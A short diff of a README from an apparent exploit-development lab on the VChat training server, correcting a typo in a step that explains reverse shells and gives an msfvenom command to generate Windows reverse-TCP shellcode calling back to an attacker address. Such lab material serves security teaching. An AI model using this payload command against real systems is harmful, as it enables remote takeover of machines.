xinwenfu/VChat_GMON_SEH/README.md

 Now that we have all the necessary parts for the creation of a exploit we will add the shellcode to our payload and gain access to a reverse shell!
 ### Exploitation
-1. Now We will need to create a reverse shell we can include in the payload, this is a program that reaches out amd makes a connection to the attacker's macihne (or one they control) from target machine and provides a shell to the attacker.
+1. Now We will need to create a reverse shell we can include in the payload, this is a program that reaches out amd makes a connection to the attacker's machine (or one they control) from target machine and provides a shell to the attacker.
 We can generate the shellcode with the following command.
 	```
 	$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 EXITFUNC=seh -f python -v SHELL -b '\x00'
 	```